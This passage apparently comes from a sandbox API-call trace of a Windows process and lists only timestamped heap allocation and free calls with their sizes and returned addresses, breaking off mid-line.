[0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x463f30 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x463f50 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1b) returned 0x46b2c0 [0102.507] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1e) returned 0x46b380 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x29) returned 0x478120 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x1e) returned 0x46b530 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x6b) returned 0x46b9f0 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x17) returned 0x46ba70 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xf) returned 0x46ba90 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x16) returned 0x46bab0 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2a) returned 0x478160 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x29) returned 0x478420 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x479350 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x21) returned 0x46b7a0 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x16) returned 0x479310 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x22) returned 0x46b800 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x12) returned 0x479330 [0102.508] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x478ab0 | out: hHeap=0x460000) returned 1 [0102.508] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xa3a7) returned 0x4793b0 [0102.510] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20) returned 0x46b5f0 [0102.510] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xa3a7) returned 0x483760 [0102.511] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.511] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xfef7) returned 0x48db10 [0102.513] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x40) returned 0x4705b0 [0102.513] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xfef7) returned 0x49da10 [0102.515] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46b5f0 | out: hHeap=0x460000) returned 1 [0102.515] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48db10 | out: hHeap=0x460000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x450) returned 0x4788e0 [0102.516] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x450) returned 0x4ad910 [0102.516] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1ea7) returned 0x4add70 [0102.516] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xf40) returned 0x4793b0 [0102.517] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x7a0) returned 0x47a300 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4add70 | out: hHeap=0x460000) returned 1 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xbf0) returned 0x4793b0 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47a300 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x640) returned 0x4788e0 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1247) returned 0x4ad910 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x520) returned 0x4788e0 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1b56) returned 0x4793b0 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8a0) returned 0x4ad910 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x28ed) returned 0x47af10 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x550) returned 0x4788e0 [0102.518] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2537) returned 0x4ad910 [0102.518] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x12b7) returned 0x4793b0 [0102.519] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x950) returned 0x47d810 [0102.519] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.519] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.519] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x3d4f) returned 0x47e170 [0102.519] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47af10 | out: hHeap=0x460000) returned 1 [0102.519] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47d810 | out: hHeap=0x460000) returned 1 [0102.519] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2377) returned 0x4ad910 [0102.519] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x11d7) returned 0x481ed0 [0102.520] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8e0) returned 0x4793b0 [0102.520] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.520] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x481ed0 | out: hHeap=0x460000) returned 1 [0102.520] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.520] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x5b0) returned 0x4788e0 [0102.520] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.520] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x640) returned 0x4788e0 [0102.520] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x5be2) returned 0x48db10 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x47e170 | out: hHeap=0x460000) returned 1 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x890) returned 0x4ad910 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xac0) returned 0x4ad910 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20) returned 0x46b920 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x960) returned 0x4ad910 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x960) returned 0x4ae280 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x460) returned 0x4788e0 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xe0f) returned 0x4aebf0 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ae280 | out: hHeap=0x460000) returned 1 [0102.521] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1c17) returned 0x493700 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xe00) returned 0x4ad910 [0102.521] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x700) returned 0x495320 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x493700 | out: hHeap=0x460000) returned 1 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x153d) returned 0x493700 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4aebf0 | out: hHeap=0x460000) returned 1 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x495320 | out: hHeap=0x460000) returned 1 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2277) returned 0x4ad910 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1157) returned 0x494c50 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8a0) returned 0x495db0 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x494c50 | out: hHeap=0x460000) returned 1 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1fc7) returned 0x4ad910 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x493700 | out: hHeap=0x460000) returned 1 [0102.522] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x495db0 | out: hHeap=0x460000) returned 1 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1657) returned 0x493700 [0102.522] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xb20) returned 0x494d60 [0102.523] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x590) returned 0x4788e0 [0102.523] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x493700 | out: hHeap=0x460000) returned 1 [0102.523] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x494d60 | out: hHeap=0x460000) returned 1 [0102.523] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2f96) returned 0x493700 [0102.523] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.523] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.523] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2b47) returned 0x4966a0 [0102.523] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x15b7) returned 0x4ad910 [0102.523] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xad0) returned 0x4aeed0 [0102.742] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4966a0 | out: hHeap=0x460000) returned 1 [0102.742] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.742] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4aeed0 | out: hHeap=0x460000) returned 1 [0102.742] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2697) returned 0x4ad910 [0102.742] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1367) returned 0x4966a0 [0102.742] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9a0) returned 0x497a10 [0102.742] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.742] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4966a0 | out: hHeap=0x460000) returned 1 [0102.742] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x474d) returned 0x4983c0 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x493700 | out: hHeap=0x460000) returned 1 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x497a10 | out: hHeap=0x460000) returned 1 [0102.743] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x920) returned 0x49cb20 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49cb20 | out: hHeap=0x460000) returned 1 [0102.743] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1b47) returned 0x4ad910 [0102.743] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xd90) returned 0x49cb20 [0102.743] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x6d0) returned 0x4af460 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49cb20 | out: hHeap=0x460000) returned 1 [0102.743] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4af460 | out: hHeap=0x460000) returned 1 [0102.743] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x5d0) returned 0x4788e0 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x6adf) returned 0x4793b0 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4983c0 | out: hHeap=0x460000) returned 1 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1887) returned 0x4ad910 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xc30) returned 0x4af1a0 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x620) returned 0x4788e0 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4af1a0 | out: hHeap=0x460000) returned 1 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8f0) returned 0x4ad910 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x480) returned 0x4788e0 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x240) returned 0x4ae210 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ae210 | out: hHeap=0x460000) returned 1 [0102.744] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x40) returned 0x470d80 [0102.744] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46b920 | out: hHeap=0x460000) returned 1 [0102.745] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x48db10 | out: hHeap=0x460000) returned 1 [0102.745] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.745] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470d80 | out: hHeap=0x460000) returned 1 [0102.745] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9900) returned 0x4793b0 [0102.746] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1bf0) returned 0x4ad910 [0102.748] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.748] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9937) returned 0x48db10 [0102.748] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.748] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20) returned 0x46b5f0 [0102.748] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9900) returned 0x4793b0 [0102.748] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1bf0) returned 0x4ad910 [0102.749] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4ad910 | out: hHeap=0x460000) returned 1 [0102.749] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x9937) returned 0x4ad910 [0102.750] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4793b0 | out: hHeap=0x460000) returned 1 [0102.750] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x40) returned 0x4709c0 [0102.750] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46b5f0 | out: hHeap=0x460000) returned 1 [0102.750] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x483760 | out: hHeap=0x460000) returned 1 [0102.750] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x49da10 | out: hHeap=0x460000) returned 1 [0102.751] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4705b0 | out: hHeap=0x460000) returned 1 [0102.751] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x4793b0 [0102.751] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x497450 [0102.751] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x8) returned 0x468cd0 [0102.751] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x4b7250 [0102.751] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479370 [0102.752] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x468cd0 | out: hHeap=0x460000) returned 1 [0102.752] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x4ca460 [0102.752] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x18) returned 0x479270 [0102.752] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479370 | out: hHeap=0x460000) returned 1 [0102.752] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x4dd670 [0102.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20) returned 0x46b3b0 [0102.753] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x479270 | out: hHeap=0x460000) returned 1 [0102.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x4f0880 [0102.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x30) returned 0x4781a0 [0102.753] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46b3b0 | out: hHeap=0x460000) returned 1 [0102.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x503a90 [0102.753] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x516ca0 [0102.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x48) returned 0x4704c0 [0102.754] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4781a0 | out: hHeap=0x460000) returned 1 [0102.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x529eb0 [0102.754] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x53d0c0 [0102.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e40080 [0102.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x68) returned 0x468cd0 [0102.755] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4704c0 | out: hHeap=0x460000) returned 1 [0102.755] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e53290 [0102.756] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e664a0 [0102.756] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e796b0 [0102.756] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e8c8c0 [0102.757] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x98) returned 0x465080 [0102.757] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x468cd0 | out: hHeap=0x460000) returned 1 [0102.757] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1e9fad0 [0102.757] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1eb2ce0 [0102.758] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1ec5ef0 [0102.758] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1ed9100 [0102.758] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1eec310 [0102.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1eff520 [0102.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xe0) returned 0x468cd0 [0102.759] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x465080 | out: hHeap=0x460000) returned 1 [0102.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1f12730 [0102.759] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1f60080 [0102.760] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1f73290 [0102.760] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1f864a0 [0102.760] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1f996b0 [0102.761] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1fac8c0 [0102.762] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1fbfad0 [0102.762] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1fd2ce0 [0102.763] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1fe5ef0 [0102.763] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x150) returned 0x46b080 [0102.763] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x468cd0 | out: hHeap=0x460000) returned 1 [0102.763] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x1ff9100 [0102.763] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x200c310 [0102.764] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x201f520 [0102.764] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2032730 [0102.764] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2045940 [0102.765] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2058b50 [0102.765] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x206bd60 [0102.766] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x207ef70 [0102.766] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2092180 [0102.766] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x20a5390 [0102.766] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x20b85a0 [0102.767] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x20cb7b0 [0102.767] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x20de9c0 [0102.767] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x20f1bd0 [0102.767] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x1f8) returned 0x4788e0 [0102.767] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x46b080 | out: hHeap=0x460000) returned 1 [0102.767] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2104de0 [0102.768] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2117ff0 [0102.768] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x212b200 [0102.768] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x213e410 [0102.769] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2160080 [0102.769] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2173290 [0102.770] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21864a0 [0102.770] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21996b0 [0102.770] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21ac8c0 [0102.771] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21bfad0 [0102.771] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21d2ce0 [0102.771] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21e5ef0 [0102.772] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x21f9100 [0102.772] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x220c310 [0102.772] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x221f520 [0102.773] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2232730 [0102.773] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2245940 [0102.773] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2258b50 [0102.774] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x226bd60 [0102.774] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x227ef70 [0102.774] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x2292180 [0102.775] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x2f0) returned 0x478ae0 [0102.775] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4788e0 | out: hHeap=0x460000) returned 1 [0102.775] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x22a5390 [0102.775] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x22b85a0 [0102.775] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x22cb7b0 [0102.776] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x13200) returned 0x22de9c0 [0102.776] RtlAllocateHeap (HeapHandle=0x460000, 